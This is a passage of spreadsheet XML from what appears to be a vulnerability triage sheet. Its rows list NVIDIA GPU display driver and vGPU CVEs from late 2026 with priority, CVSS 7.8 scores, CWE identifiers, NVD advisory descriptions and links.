          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47540</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47541</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47541</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47545</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47545</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47548</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S172"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72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47548</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47550</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an unprivileged local user can supply an untrusted pointer that the driver dereferences without validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47550</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47551</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where a user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47551</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47552</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could bypass an authorization check and modify privileged configuration. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47552</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47553</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47553</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47556</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an integer overflow that leads to an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47556</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47558</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a double-free of imported memory state. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47558</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47559</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could access memory belonging to another user's process. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47559</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47560</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47560</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47561</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where the size of an ioctl input buffer is not validated, allowing an unprivileged caller to trigger an out-of-bounds write in kernel memory. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47561</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47563</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause a NULL pointer dereference. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47563</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47569</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause a type confusion via a handle recycle race. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47569</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47570</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the CUDA driver where an attacker could cause a library to be loaded from an uncontrolled search path. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47570</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47571</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in kernel-mode escape handling where an attacker with local access could bypass an authorization check that is intended to restrict certain operations based on client execution context. A successful exploit of this vulnerability might lead to escalation of privilege, information disclosure, data tampering, denial of service, or code execution.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47571</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47572</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
